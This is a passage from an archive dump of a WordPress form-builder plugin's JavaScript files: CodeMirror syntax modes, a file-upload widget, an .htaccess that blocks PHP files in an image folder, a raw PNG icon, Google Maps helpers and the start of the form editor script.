    this.column = column;
    this.type = type;
    this.align = align;
    this.prev = prev;
  }
  function pushContext(state, col, type) {
    return state.context = new Context(state.indented, col, type, null, state.context);
  }
  function popContext(state) {
    var t = state.context.type;
    if (t == ")" || t == "]" || t == "}")
      state.indented = state.context.indented;
    return state.context = state.context.prev;
  }

  // Interface

  return {
    startState: function(basecolumn) {
      return {
        tokenize: null,
        context: new Context((basecolumn || 0) - indentUnit, 0, "top", false),
        indented: 0,
        startOfLine: true
      };
    },

    token: function(stream, state) {
      var ctx = state.context;
      if (stream.sol()) {
        if (ctx.align == null) ctx.align = false;
        state.indented = stream.indentation();
        state.startOfLine = true;
      }
      if (stream.eatSpace()) return null;
      curPunc = null;
      var style = (state.tokenize || tokenBase)(stream, state);
      if (style == "comment" || style == "meta") return style;
      if (ctx.align == null) ctx.align = true;

      if ((curPunc == ";" || curPunc == ":") && ctx.type == "statement") popContext(state);
      else if (curPunc == "{") pushContext(state, stream.column(), "}");
      else if (curPunc == "[") pushContext(state, stream.column(), "]");
      else if (curPunc == "(") pushContext(state, stream.column(), ")");
      else if (curPunc == "}") {
        while (ctx.type == "statement") ctx = popContext(state);
        if (ctx.type == "}") ctx = popContext(state);
        while (ctx.type == "statement") ctx = popContext(state);
      }
      else if (curPunc == ctx.type) popContext(state);
      else if (ctx.type == "}" || ctx.type == "top" || (ctx.type == "statement" && curPunc == "newstatement"))
        pushContext(state, stream.column(), "statement");
      state.startOfLine = false;
      return style;
    },

    indent: function(state, textAfter) {
      if (state.tokenize != tokenBase && state.tokenize != null) return 0;
      var ctx = state.context, firstChar = textAfter && textAfter.charAt(0);
      if (ctx.type == "statement" && firstChar == "}") ctx = ctx.prev;
      var closing = firstChar == ctx.type;
      if (ctx.type == "statement") return ctx.indented + (firstChar == "{" ? 0 : indentUnit);
      else if (ctx.align) return ctx.column + (closing ? 0 : 1);
      else return ctx.indented + (closing ? 0 : indentUnit);
    },

    electricChars: "{}"
  };
});

(function() {
  function words(str) {
    var obj = {}, words = str.split(" ");
    for (var i = 0; i < words.length; ++i) obj[words[i]] = true;
    return obj;
  }
  var cKeywords = "auto if break int case long char register continue return default short do sizeof " +
    "double static else struct entry switch extern typedef float union for unsigned " +
    "goto while enum void const signed volatile";

  function cppHook(stream, state) {
    if (!state.startOfLine) return false;
    stream.skipToEnd();
    return "meta";
  }

  // C#-style strings where "" escapes a quote.
  function tokenAtString(stream, state) {
    var next;
    while ((next = stream.next()) != null) {
      if (next == '"' && !stream.eat('"')) {
        state.tokenize = null;
        break;
      }
    }
    return "string";
  }

  CodeMirror.defineMIME("text/x-csrc", {
    name: "clike",
    keywords: words(cKeywords),
    blockKeywords: words("case do else for if switch while struct"),
    atoms: words("null"),
    hooks: {"#": cppHook}
  });
  CodeMirror.defineMIME("text/x-c++src", {
    name: "clike",
    keywords: words(cKeywords + " asm dynamic_cast namespace reinterpret_cast try bool explicit new " +
                    "static_cast typeid catch operator template typename class friend private " +
                    "this using const_cast inline public throw virtual delete mutable protected " +
                    "wchar_t"),
    blockKeywords: words("catch class do else finally for if struct switch try while"),
    atoms: words("true false null"),
    hooks: {"#": cppHook}
  });
  CodeMirror.defineMIME("text/x-java", {
    name: "clike",
    keywords: words("abstract assert boolean break byte case catch char class const continue default " + 
                    "do double else enum extends final finally float for goto if implements import " +
                    "instanceof int interface long native new package private protected public " +
                    "return short static strictfp super switch synchronized this throw throws transient " +
                    "try void volatile while"),
    blockKeywords: words("catch class do else finally for if switch try while"),
    atoms: words("true false null"),
    hooks: {
      "@": function(stream, state) {
        stream.eatWhile(/[\w\$_]/);
        return "meta";
      }
    }
  });
  CodeMirror.defineMIME("text/x-csharp", {
    name: "clike",
    keywords: words("abstract as base bool break byte case catch char checked class const continue decimal" + 
                    " default delegate do double else enum event explicit extern finally fixed float for" + 
                    " foreach goto if implicit in int interface internal is lock long namespace new object" + 
                    " operator out override params private protected public readonly ref return sbyte sealed short" + 
                    " sizeof stackalloc static string struct switch this throw try typeof uint ulong unchecked" + 
                    " unsafe ushort using virtual void volatile while add alias ascending descending dynamic from get" + 
                    " global group into join let orderby partial remove select set value var yield"),
    blockKeywords: words("catch class do else finally for foreach if struct switch try while"),
    atoms: words("true false null"),
    hooks: {
      "@": function(stream, state) {
        if (stream.eat('"')) {
          state.tokenize = tokenAtString;
          return tokenAtString(stream, state);
        }
        stream.eatWhile(/[\w\$_]/);
        return "meta";
      }
    }
  });
  CodeMirror.defineMIME("text/x-scala", {
    name: "clike",
    keywords: words(
      
      /* scala */
      "abstract case catch class def do else extends false final finally for forSome if " +
      "implicit import lazy match new null object override package private protected return " +
      "sealed super this throw trait try trye type val var while with yield _ : = => <- <: " +
      "<% >: # @ " +
                    
      /* package scala */
      "assert assume require print println printf readLine readBoolean readByte readShort " +
      "readChar readInt readLong readFloat readDouble " +
      
      "AnyVal App Application Array BufferedIterator BigDecimal BigInt Char Console Either " +
      "Enumeration Equiv Error Exception Fractional Function IndexedSeq Integral Iterable " +
      "Iterator List Map Numeric Nil NotNull Option Ordered Ordering PartialFunction PartialOrdering " +
      "Product Proxy Range Responder Seq Serializable Set Specializable Stream StringBuilder " +
      "StringContext Symbol Throwable Traversable TraversableOnce Tuple Unit Vector :: #:: " +
      
      /* package java.lang */            
      "Boolean Byte Character CharSequence Class ClassLoader Cloneable Comparable " +
      "Compiler Double Exception Float Integer Long Math Number Object Package Pair Process " +
      "Runtime Runnable SecurityManager Short StackTraceElement StrictMath String " +
      "StringBuffer System Thread ThreadGroup ThreadLocal Throwable Triple Void"
      
      
    ),
    blockKeywords: words("catch class do else finally for forSome if match switch try while"),
    atoms: words("true false null"),
    hooks: {
      "@": function(stream, state) {
        stream.eatWhile(/[\w\$_]/);
        return "meta";
      }
    }
  });
}());
js/layout/javascript.js000060400000031023152434416630011204 0ustar00CodeMirror.defineMode("javascript", function(config, parserConfig) {
  var indentUnit = config.indentUnit;
  var jsonMode = parserConfig.json;

  // Tokenizer

  var keywords = function(){
    function kw(type) {return {type: type, style: "keyword"};}
    var A = kw("keyword a"), B = kw("keyword b"), C = kw("keyword c");
    var operator = kw("operator"), atom = {type: "atom", style: "atom"};
    return {
      "if": A, "while": A, "with": A, "else": B, "do": B, "try": B, "finally": B,
      "return": C, "break": C, "continue": C, "new": C, "delete": C, "throw": C,
      "var": kw("var"), "const": kw("var"), "let": kw("var"),
      "function": kw("function"), "catch": kw("catch"),
      "for": kw("for"), "switch": kw("switch"), "case": kw("case"), "default": kw("default"),
      "in": operator, "typeof": operator, "instanceof": operator,
      "true": atom, "false": atom, "null": atom, "undefined": atom, "NaN": atom, "Infinity": atom
    };
  }();

  var isOperatorChar = /[+\-*&%=<>!?|]/;

  function chain(stream, state, f) {
    state.tokenize = f;
    return f(stream, state);
  }

  function nextUntilUnescaped(stream, end) {
    var escaped = false, next;
    while ((next = stream.next()) != null) {
      if (next == end && !escaped)
        return false;
      escaped = !escaped && next == "\\";
    }
    return escaped;
  }

  // Used as scratch variables to communicate multiple values without
  // consing up tons of objects.
  var type, content;
  function ret(tp, style, cont) {
    type = tp; content = cont;
    return style;
  }

  function jsTokenBase(stream, state) {
    var ch = stream.next();
    if (ch == '"' || ch == "'")
      return chain(stream, state, jsTokenString(ch));
    else if (/[\[\]{}\(\),;\:\.]/.test(ch))
      return ret(ch);
    else if (ch == "0" && stream.eat(/x/i)) {
      stream.eatWhile(/[\da-f]/i);
      return ret("number", "number");
    }      
    else if (/\d/.test(ch) || ch == "-" && stream.eat(/\d/)) {
      stream.match(/^\d*(?:\.\d*)?(?:[eE][+\-]?\d+)?/);
      return ret("number", "number");
    }
    else if (ch == "/") {
      if (stream.eat("*")) {
        return chain(stream, state, jsTokenComment);
      }
      else if (stream.eat("/")) {
        stream.skipToEnd();
        return ret("comment", "comment");
      }
      else if (state.reAllowed) {
        nextUntilUnescaped(stream, "/");
        stream.eatWhile(/[gimy]/); // 'y' is "sticky" option in Mozilla
        return ret("regexp", "string-2");
      }
      else {
        stream.eatWhile(isOperatorChar);
        return ret("operator", null, stream.current());
      }
    }
    else if (ch == "#") {
        stream.skipToEnd();
        return ret("error", "error");
    }
    else if (isOperatorChar.test(ch)) {
      stream.eatWhile(isOperatorChar);
      return ret("operator", null, stream.current());
    }
    else {
      stream.eatWhile(/[\w\$_]/);
      var word = stream.current(), known = keywords.propertyIsEnumerable(word) && keywords[word];
      return (known && state.kwAllowed) ? ret(known.type, known.style, word) :
                     ret("variable", "variable", word);
    }
  }

  function jsTokenString(quote) {
    return function(stream, state) {
      if (!nextUntilUnescaped(stream, quote))
        state.tokenize = jsTokenBase;
      return ret("string", "string");
    };
  }

  function jsTokenComment(stream, state) {
    var maybeEnd = false, ch;
    while (ch = stream.next()) {
      if (ch == "/" && maybeEnd) {
        state.tokenize = jsTokenBase;
        break;
      }
      maybeEnd = (ch == "*");
    }
    return ret("comment", "comment");
  }

  // Parser

  var atomicTypes = {"atom": true, "number": true, "variable": true, "string": true, "regexp": true};

  function JSLexical(indented, column, type, align, prev, info) {
    this.indented = indented;
    this.column = column;
    this.type = type;
    this.prev = prev;
    this.info = info;
    if (align != null) this.align = align;
  }

  function inScope(state, varname) {
    for (var v = state.localVars; v; v = v.next)
      if (v.name == varname) return true;
  }

  function parseJS(state, style, type, content, stream) {
    var cc = state.cc;
    // Communicate our context to the combinators.
    // (Less wasteful than consing up a hundred closures on every call.)
    cx.state = state; cx.stream = stream; cx.marked = null, cx.cc = cc;
  
    if (!state.lexical.hasOwnProperty("align"))
      state.lexical.align = true;

    while(true) {
      var combinator = cc.length ? cc.pop() : jsonMode ? expression : statement;
      if (combinator(type, content)) {
        while(cc.length && cc[cc.length - 1].lex)
          cc.pop()();
        if (cx.marked) return cx.marked;
        if (type == "variable" && inScope(state, content)) return "variable-2";
        return style;
      }
    }
  }

  // Combinator utils

  var cx = {state: null, column: null, marked: null, cc: null};
  function pass() {
    for (var i = arguments.length - 1; i >= 0; i--) cx.cc.push(arguments[i]);
  }
  function cont() {
    pass.apply(null, arguments);
    return true;
  }
  function register(varname) {
    var state = cx.state;
    if (state.context) {
      cx.marked = "def";
      for (var v = state.localVars; v; v = v.next)
        if (v.name == varname) return;
      state.localVars = {name: varname, next: state.localVars};
    }
  }

  // Combinators

  var defaultVars = {name: "this", next: {name: "arguments"}};
  function pushcontext() {
    if (!cx.state.context) cx.state.localVars = defaultVars;
    cx.state.context = {prev: cx.state.context, vars: cx.state.localVars};
  }
  function popcontext() {
    cx.state.localVars = cx.state.context.vars;
    cx.state.context = cx.state.context.prev;
  }
  function pushlex(type, info) {
    var result = function() {
      var state = cx.state;
      state.lexical = new JSLexical(state.indented, cx.stream.column(), type, null, state.lexical, info)
    };
    result.lex = true;
    return result;
  }
  function poplex() {
    var state = cx.state;
    if (state.lexical.prev) {
      if (state.lexical.type == ")")
        state.indented = state.lexical.indented;
      state.lexical = state.lexical.prev;
    }
  }
  poplex.lex = true;

  function expect(wanted) {
    return function expecting(type) {
      if (type == wanted) return cont();
      else if (wanted == ";") return pass();
      else return cont(arguments.callee);
    };
  }

  function statement(type) {
    if (type == "var") return cont(pushlex("vardef"), vardef1, expect(";"), poplex);
    if (type == "keyword a") return cont(pushlex("form"), expression, statement, poplex);
    if (type == "keyword b") return cont(pushlex("form"), statement, poplex);
    if (type == "{") return cont(pushlex("}"), block, poplex);
    if (type == ";") return cont();
    if (type == "function") return cont(functiondef);
    if (type == "for") return cont(pushlex("form"), expect("("), pushlex(")"), forspec1, expect(")"),
                                      poplex, statement, poplex);
    if (type == "variable") return cont(pushlex("stat"), maybelabel);
    if (type == "switch") return cont(pushlex("form"), expression, pushlex("}", "switch"), expect("{"),
                                         block, poplex, poplex);
    if (type == "case") return cont(expression, expect(":"));
    if (type == "default") return cont(expect(":"));
    if (type == "catch") return cont(pushlex("form"), pushcontext, expect("("), funarg, expect(")"),
                                        statement, poplex, popcontext);
    return pass(pushlex("stat"), expression, expect(";"), poplex);
  }
  function expression(type) {
    if (atomicTypes.hasOwnProperty(type)) return cont(maybeoperator);
    if (type == "function") return cont(functiondef);
    if (type == "keyword c") return cont(maybeexpression);
    if (type == "(") return cont(pushlex(")"), maybeexpression, expect(")"), poplex, maybeoperator);
    if (type == "operator") return cont(expression);
    if (type == "[") return cont(pushlex("]"), commasep(expression, "]"), poplex, maybeoperator);
    if (type == "{") return cont(pushlex("}"), commasep(objprop, "}"), poplex, maybeoperator);
    return cont();
  }
  function maybeexpression(type) {
    if (type.match(/[;\}\)\],]/)) return pass();
    return pass(expression);
  }
    
  function maybeoperator(type, value) {
    if (type == "operator" && /\+\+|--/.test(value)) return cont(maybeoperator);
    if (type == "operator" || type == ":") return cont(expression);
    if (type == ";") return;
    if (type == "(") return cont(pushlex(")"), commasep(expression, ")"), poplex, maybeoperator);
    if (type == ".") return cont(property, maybeoperator);
    if (type == "[") return cont(pushlex("]"), expression, expect("]"), poplex, maybeoperator);
  }
  function maybelabel(type) {
    if (type == ":") return cont(poplex, statement);
    return pass(maybeoperator, expect(";"), poplex);
  }
  function property(type) {
    if (type == "variable") {cx.marked = "property"; return cont();}
  }
  function objprop(type) {
    if (type == "variable") cx.marked = "property";
    if (atomicTypes.hasOwnProperty(type)) return cont(expect(":"), expression);
  }
  function commasep(what, end) {
    function proceed(type) {
      if (type == ",") return cont(what, proceed);
      if (type == end) return cont();
      return cont(expect(end));
    }
    return function commaSeparated(type) {
      if (type == end) return cont();
      else return pass(what, proceed);
    };
  }
  function block(type) {
    if (type == "}") return cont();
    return pass(statement, block);
  }
  function vardef1(type, value) {
    if (type == "variable"){register(value); return cont(vardef2);}
    return cont();
  }
  function vardef2(type, value) {
    if (value == "=") return cont(expression, vardef2);
    if (type == ",") return cont(vardef1);
  }
  function forspec1(type) {
    if (type == "var") return cont(vardef1, forspec2);
    if (type == ";") return pass(forspec2);
    if (type == "variable") return cont(formaybein);
    return pass(forspec2);
  }
  function formaybein(type, value) {
    if (value == "in") return cont(expression);
    return cont(maybeoperator, forspec2);
  }
  function forspec2(type, value) {
    if (type == ";") return cont(forspec3);
    if (value == "in") return cont(expression);
    return cont(expression, expect(";"), forspec3);
  }
  function forspec3(type) {
    if (type != ")") cont(expression);
  }
  function functiondef(type, value) {
    if (type == "variable") {register(value); return cont(functiondef);}
    if (type == "(") return cont(pushlex(")"), pushcontext, commasep(funarg, ")"), poplex, statement, popcontext);
  }
  function funarg(type, value) {
    if (type == "variable") {register(value); return cont();}
  }

  // Interface

  return {
    startState: function(basecolumn) {
      return {
        tokenize: jsTokenBase,
        reAllowed: true,
        kwAllowed: true,
        cc: [],
        lexical: new JSLexical((basecolumn || 0) - indentUnit, 0, "block", false),
        localVars: parserConfig.localVars,
        context: parserConfig.localVars && {vars: parserConfig.localVars},
        indented: 0
      };
    },

    token: function(stream, state) {
      if (stream.sol()) {
        if (!state.lexical.hasOwnProperty("align"))
          state.lexical.align = false;
        state.indented = stream.indentation();
      }
      if (stream.eatSpace()) return null;
      var style = state.tokenize(stream, state);
      if (type == "comment") return style;
      state.reAllowed = !!(type == "operator" || type == "keyword c" || type.match(/^[\[{}\(,;:]$/));
      state.kwAllowed = type != '.';
      return parseJS(state, style, type, content, stream);
    },

    indent: function(state, textAfter) {
      if (state.tokenize != jsTokenBase) return 0;
      var firstChar = textAfter && textAfter.charAt(0), lexical = state.lexical;
      if (lexical.type == "stat" && firstChar == "}") lexical = lexical.prev;
      var type = lexical.type, closing = firstChar == type;
      if (type == "vardef") return lexical.indented + 4;
      else if (type == "form" && firstChar == "{") return lexical.indented;
      else if (type == "stat" || type == "form") return lexical.indented + indentUnit;
      else if (lexical.info == "switch" && !closing)
        return lexical.indented + (/^(?:case|default)\b/.test(textAfter) ? indentUnit : 2 * indentUnit);
      else if (lexical.align) return lexical.column + (closing ? 0 : 1);
      else return lexical.indented + (closing ? 0 : indentUnit);
    },

    electricChars: ":{}"
  };
});

CodeMirror.defineMIME("text/javascript", "javascript");
CodeMirror.defineMIME("application/json", {name: "javascript", json: true});
js/file-upload.js000060400000004126152434416630007726 0ustar00
(function () {
	
	// import library
	eval( JELLY.unpack() );

	addDomReady( function () {
	
		// Load our css
		
		// Create a reusable tweening object
		var tween = new Tween,
	
			// event handlers, including blur/focus to 
			// restore keyboard navigation
			onUploadChange = function ( e ) {

				var status = retrieveData( this, 'upload-status' );
				
				if ( this.value ) {
					// IE shows the whole system path, we're reducing it 
					// to the filename for consistency
					var value = '';
					var files = this.files;
					for (var i = 0; i < files.length-1; i++)
						value =value+( browser.ie ? files[i].name.split('\\').pop() : files[i].name)+', ';
					i = files.length-1;	
					value =value+( browser.ie ? files[i].name.split('\\').pop() : files[i].name);
					status.innerHTML = value;
          
					insertAfter( status, this.parentNode );
					// Only tween if we're responding to an event
					if ( e ) { 
						tween.setElement( status ).
							setOpacity( 0 ).
							start({ 
								opacity: 1, duration: 500 
							});
					}
				}
				else if ( status && status.parentNode ) {
					removeElement( status );
				}
			}, 
			onUploadFocus = function () { 
				addClass( this.parentNode, 'focus' ); 
			},
			onUploadBlur = function () { 
				removeClass( this.parentNode, 'focus' ); 
			};
		
		
		Q( '.file-upload input[type=file]' ).each( function ( field ) {
			
			// Create a status element, and store it
			storeData( field, 'upload-status', createElement( 'span.file-upload-status' ) );
			
			// Bind events
			addEvent( field, 'focus', onUploadFocus );
			addEvent( field, 'blur', onUploadBlur );
			addEvent( field, 'change', onUploadChange );
			
			// Set current state 
			onUploadChange.call( field );
			
			// Move the file input in Firefox / Opera so that the button part is
			// in the hit area. Otherwise we get a text selection cursor
			// which you cannot override with CSS
			if ( browser.firefox || browser.opera ) {
				field.style.left = '-800px';
			}
			else if ( browser.ie ) {
				// Minimizes the text input part in IE
				field.style.width = '0';
			}
		});
	});

})();js/images/.htaccess000044400000000424152434416630010231 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>js/images/form_maker_edit_but.png000060400000001324152434416630013140 0ustar00�PNG


IHDR��UgAMA���atEXtSoftwareAdobe ImageReadyq�e<fIDAT8O��KhQ�ĕhݸw���nDA

uc7��
*�+(�`��((>
ں���aLM�&%��Lf����$6�Є$��=w�7�B�r�3���������V����ͦ�h4���uъ���:"Q�ծr�B�T�\F�X4�f������#�N����+�J�3�ƚ>�"������߳��\���7Q�b�<���1�����#s|7��9�N�uLí�-8>D1tK�̼��BT�╂����i����Ҹ�<���4F)�Vt�:�PS�^*�:����\.�$���t,,ncvn�o��
u#Q6 Y��)m_�P�u��K?Je�~'��,��S��|@����R���M6e�0�J��(*�*��6��%�b1S{���W�ؐ5���%���É�hS�@<�C�,� ���еuD�
&feK<>��u�p8l�$	�K���,��>.Z�$Ȳ�5L$pLIx2�̸D�`]C���A<�p�w2��b�&U�&~b��t�]��Yc�"�f���bx����?F�^�����`����f9�.�Mw���h�v���3͌�o
��P�`O�#�A�锏Щ_d�YNfg�v�i��A.Ѿ��n���MUhY\$��IEND�B`�js/if_gmap_back_end.js000060400000016430152434416630010736 0ustar00/* Code based on Google Map APIv3 Tutorials */


var gmapdata= new Array();
var gmapmarker = new Array();

function if_gmap_init(id)
{
	map=document.getElementById(id+"_elementform_id_temp");
	var def_zoomval = parseInt(map.getAttribute("zoom"));
	var def_longval = map.getAttribute("center_x");
	var def_latval  = map.getAttribute("center_y");

    var curpoint = new google.maps.LatLng(def_latval,def_longval);

    gmapdata[id] = new google.maps.Map(document.getElementById(id+"_elementform_id_temp"), {
                center: curpoint,
                zoom: def_zoomval,
                mapTypeId: 'roadmap'
                });
				
	google.maps.event.addListener(gmapdata[id], 'zoom_changed', function() {
			document.getElementById(id+"_elementform_id_temp").setAttribute("zoom", gmapdata[id].getZoom());    
		});
        
    gmapmarker[id] = new Array();
   
        return false;
} // end of if_gmap_init

function update_position(id, i)
{

        var longval = document.getElementById("longval"+i).value;
        var latval = document.getElementById("latval"+i).value;
        if (longval.length > 0) {
                if (isNaN(parseFloat(longval)) == true) {
                        longval = 2.294254;
                } // end of if
        } else {
                longval = 2.294254;
        } // end of if

        if (latval.length > 0) {
                if (isNaN(parseFloat(latval)) == true) {
                        latval = 48.858334;
                } // end of if
        } else {
                latval = 48.858334;
        } // end of if

        var curpoint = new google.maps.LatLng(latval,longval);

        gmapmarker[id][i].setPosition(curpoint);
        gmapdata[id].setCenter(curpoint);
        
        cur_zoom=gmapdata[id].getZoom();
        
        gmapdata[id].setZoom(cur_zoom);
	
		geocoder = new google.maps.Geocoder();

		
        geocoder.geocode({'latLng': gmapmarker[id][i].getPosition()}, function(results, status) 
            {
                if (status == google.maps.GeocoderStatus.OK) 
                {
                    if (results[0]) 
                    {
                        if(document.getElementById("addrval"+i)) 
							document.getElementById("addrval"+i).value = results[0].formatted_address;
                    }
                }
            });

        return false;
}
function	reomve_marker(id,i)
{
gmapmarker[id][i].setMap(null);
}


function add_marker_on_map(id, i, w_long, w_lat, w_info, dragb)
{
 	map=document.getElementById(id+"_elementform_id_temp");
	if(w_long==null)
	{
		var marker_point = gmapdata[id].getCenter();
		w_lat=gmapdata[id].getCenter().lat();
		w_long=gmapdata[id].getCenter().lng();
	}
	else
		var marker_point = new google.maps.LatLng(w_lat, w_long);
	
	
    geocoder = new google.maps.Geocoder();
       
    gmapmarker[id][i] = new google.maps.Marker({
                                        map: gmapdata[id],
                                        position: marker_point,
                                        draggable: dragb
                                });
								
	gmapmarker[id][i].setDraggable(dragb);
	
    infoW = new google.maps.InfoWindow;
        
    google.maps.event.addListener(gmapdata[id], 'mouseover', function(event) 
    {       
        if(!document.getElementById("longval"+i))
		{
			gmapmarker[id][i].setDraggable(false);
		}
    });
        
		
     /*   google.maps.event.addListener(gmapdata, 'click', function(event) {
                if(document.getElementById("longval"))
                {
                document.getElementById("longval").value = event.latLng.lng().toFixed(6);
                document.getElementById("latval").value = event.latLng.lat().toFixed(6);
                gmapmarker.setPosition(event.latLng);
                if_gmap_updateMap();
                
                 geocoder.geocode({'latLng': gmapmarker.getPosition()}, function(results, status) 
                {
                        if (status == google.maps.GeocoderStatus.OK) 
                        {
                                if (results[0]) 
                                {
                        
                                          if(document.getElementById("addrval")) document.getElementById("addrval").value = results[0].formatted_address;
                                }
                        }
                    });
        }

        });*/

    google.maps.event.addListener(gmapmarker[id][i], 'drag', function() 
	{
        if(document.getElementById("longval"+i))
        {
			geocoder.geocode({'latLng': gmapmarker[id][i].getPosition()}, function(results, status) 
            {
                if (status == google.maps.GeocoderStatus.OK) 
                {
                    if (results[0]) 
                    {
                        if(document.getElementById("addrval"+i)) 
							document.getElementById("addrval"+i).value = results[0].formatted_address;
                    }
                }
            });

			map.setAttribute("long"+i, gmapmarker[id][i].getPosition().lng().toFixed(6));
			map.setAttribute("lat"+i, gmapmarker[id][i].getPosition().lat().toFixed(6));
            document.getElementById("latval"+i).value = gmapmarker[id][i].getPosition().lat().toFixed(6);
            document.getElementById("longval"+i).value = gmapmarker[id][i].getPosition().lng().toFixed(6);
        }
    });
	
    google.maps.event.addListener(gmapmarker[id][i], 'click', function() 
	{
        infoW.setContent('<div style="overflow: hidden;">'+document.getElementById(id+"_elementform_id_temp").getAttribute('info'+i)+"</div>");
		var infoWOpt = {
				maxWidth: "300"
				};
		infoW.setOptions(infoWOpt);
        infoW.open(this.getMap(), this);
    });
        
	if(document.getElementById("longval"+i))
	{
		document.getElementById("longval"+i).value = w_long;
		document.getElementById("latval"+i).value = w_lat;
			
		geocoder.geocode({'latLng': gmapmarker[id][i].getPosition()}, function(results, status) 
		{
			if (status == google.maps.GeocoderStatus.OK) 
			{
				if (results[0]) 
				{
					if(document.getElementById("addrval"+i)) document.getElementById("addrval"+i).value = results[0].formatted_address;
				}
			}
		});
		map.setAttribute("long"+i, w_long);
		map.setAttribute("lat"+i, w_lat);
	}
    return false;

	
} // end of if_gmap_init


function changeAddress(id, i) {
    var addrval = document.getElementById("addrval"+i).value;
    geocoder.geocode( { 'address': addrval}, function(results, status) {
      if (status == google.maps.GeocoderStatus.OK) {
        gmapdata[id].setCenter(results[0].geometry.location);
        gmapmarker[id][i].setPosition(results[0].geometry.location);
        document.getElementById("latval"+i).value = gmapmarker[id][i].getPosition().lat().toFixed(6);
        document.getElementById("longval"+i).value = gmapmarker[id][i].getPosition().lng().toFixed(6);
		map.setAttribute("long"+i, gmapmarker[id][i].getPosition().lng().toFixed(6));
		map.setAttribute("lat"+i, gmapmarker[id][i].getPosition().lat().toFixed(6));
}
    });
}

function change_info(value,id,i)
{
map=document.getElementById(id+"_elementform_id_temp");
map.setAttribute("info"+i, value);
}

function if_gmap_updateMap(id)
{
	map=document.getElementById(id+"_elementform_id_temp");
	w_long=gmapdata[id].getCenter().lng();;
	w_lat=gmapdata[id].getCenter().lat();;
	map.setAttribute("center_x", w_long);
	map.setAttribute("center_y", w_lat);
}

js/formmaker_div_free.js000060400004224164152434416630011365 0ustar00j = 2;
var c;
var need_enable=true;
var a = new Array();

if (ajaxurl.indexOf("://") != -1) {
  var url_for_ajax = ajaxurl;
}
else {
  var url_for_ajax = location.protocol + '//' + location.host + ajaxurl;
}

function active_reset(val, id) {
	if(val) {
		document.getElementById(id+'_element_resetform_id_temp').style.display = "inline";
	}
	else {
		document.getElementById(id+'_element_resetform_id_temp').style.display = "none";
	}
}

function check_required() {
	alert('"Submit" and "Reset" buttons are disabled in back end.');
}

function isNumber(n) {
  return !isNaN(parseFloat(n)) && isFinite(n);
}

function change_field_name(id, x) {
	value = x.value;
	if (value == parseInt(value)) {
		alert('The name of the field cannot be a number.');
		x.value="";
		document.getElementById(id+'_elementform_id_temp').name='';
		document.getElementById(id+'_element_labelform_id_temp').innerHTML='';
    document.getElementById(id+'_hidden_nameform_id_temp').innerHTML='';
		return;
	}
		
	if (value==id+"_elementform_id_temp") {
		alert('"Field Name" should differ from "Field Id".')
		x.value="";
	}
	else {
		document.getElementById(id+'_elementform_id_temp').name=value;
		document.getElementById(id+'_element_labelform_id_temp').innerHTML=value;
    document.getElementById(id+'_hidden_nameform_id_temp').innerHTML=value;
	}
}

function change_field_value(id, value) {
	document.getElementById(id+'_elementform_id_temp').value=value;
  document.getElementById(id+'_hidden_valueform_id_temp').innerHTML=value;
}

function chnage_icons_src(img,icon) {
  if (img.src.indexOf("hover")!=-1) {
    img.src =  plugin_url + "/images/" + icon + ".png?ver=1.8.0";
  }
  else {
    img.src =  plugin_url + "/images/" + icon + "_hover.png?ver=1.8.0";
  }
}

function return_attributes(id) {
	attr_names= new Array();
	attr_values= new Array();
	var input=document.getElementById(id);
	if(input) {
		atr=input.attributes;
			for(i=0;i<30;i++)
				if(atr[i] )
				{
				
					if(atr[i].name.indexOf("add_")==0)
					{
				
						attr_names.push(atr[i].name.replace('add_',''));
						attr_values.push(atr[i].value);
					}
				}
	}

	return Array(attr_names, attr_values);
}

function refresh_attr(x,type)
{
	switch(type)
	{
		case "type_text":
			
		{
			id_array=Array();
			id_array[0]=x+'_elementform_id_temp';
			break;
		}
		
		
		case "type_star_rating":
		{
			id_array=Array();
			id_array[0]=x+'_elementform_id_temp';
			
			break;
		}
		
		case "type_scale_rating":
		{
			id_array=Array();
			id_array[0]=x+'_elementform_id_temp';
			
			break;
		}
		
		case "type_spinner":
		{
			id_array=Array();
			id_array[0]=x+'_elementform_id_temp';
			
			break;
		}
		
		case "type_slider":
		{
			id_array=Array();
			id_array[0]=x+'_elementform_id_temp';
			
			break;
		}
		
		case "type_range":
		{
			id_array=Array();
			id_array[0]=x+'_elementform_id_temp0';
			id_array[1]=x+'_elementform_id_temp1';
			
			break;
		}
		
		case "type_grading":
		{
			id_array=Array();
			id_array[0]=x+'_elementform_id_temp';
			
			
			break;
		}
		
		case "type_matrix":
		{
			id_array=Array();
			id_array[0]=x+'_elementform_id_temp';
			
			break;
		}
		case "type_name":
			
		{
			id_array=Array();
			id_array[0]=x+'_element_firstform_id_temp';
			id_array[1]=x+'_element_lastform_id_temp';
			id_array[2]=x+'_element_titleform_id_temp';
			id_array[3]=x+'_element_middleform_id_temp';
			break;
		}
		
		case "type_address":
			
		{
			id_array=Array();
			id_array[0]=x+'_street1form_id_temp';
			id_array[1]=x+'_street2form_id_temp';
			id_array[2]=x+'_cityform_id_temp';
			id_array[3]=x+'_stateform_id_temp';
			id_array[4]=x+'_postalform_id_temp';
			id_array[5]=x+'_countryform_id_temp';
			break;
		}
		
		case "type_checkbox":
			
		{
			id_array=Array();
			for(z=0;z<50;z++)
				id_array[z]=x+'_elementform_id_temp'+z;
			break;
		}
		
		case "type_time":
			
		{
			id_array=Array();
			id_array[0]=x+'_hhform_id_temp';
			id_array[1]=x+'_mmform_id_temp';
			id_array[2]=x+'_ssform_id_temp';
			id_array[3]=x+'_am_pmform_id_temp';
			break;
		}
		case "type_date":
			
		{
			id_array=Array();
			id_array[0]=x+'_elementform_id_temp';
			id_array[1]=x+'_buttonform_id_temp';
			break;
		}
		
		case "type_date_fields":
			
		{
			id_array=Array();
			id_array[0]=x+'_dayform_id_temp';
			id_array[1]=x+'_monthform_id_temp';
			id_array[2]=x+'_yearform_id_temp';
			break;
		}
		
		case "type_captcha":
			
		{
			id_array=Array();
			id_array[0]='_wd_captchaform_id_temp';
			id_array[1]='_wd_captcha_inputform_id_temp';
			id_array[2]='_element_refreshform_id_temp';
			break;
		}
		case "type_arithmetic_captcha":
		{
			id_array=Array();
			id_array[0]='_wd_arithmetic_captchaform_id_temp';
			id_array[1]='_wd_arithmetic_captcha_inputform_id_temp';
			id_array[2]='_element_refreshform_id_temp';
			break;
		}
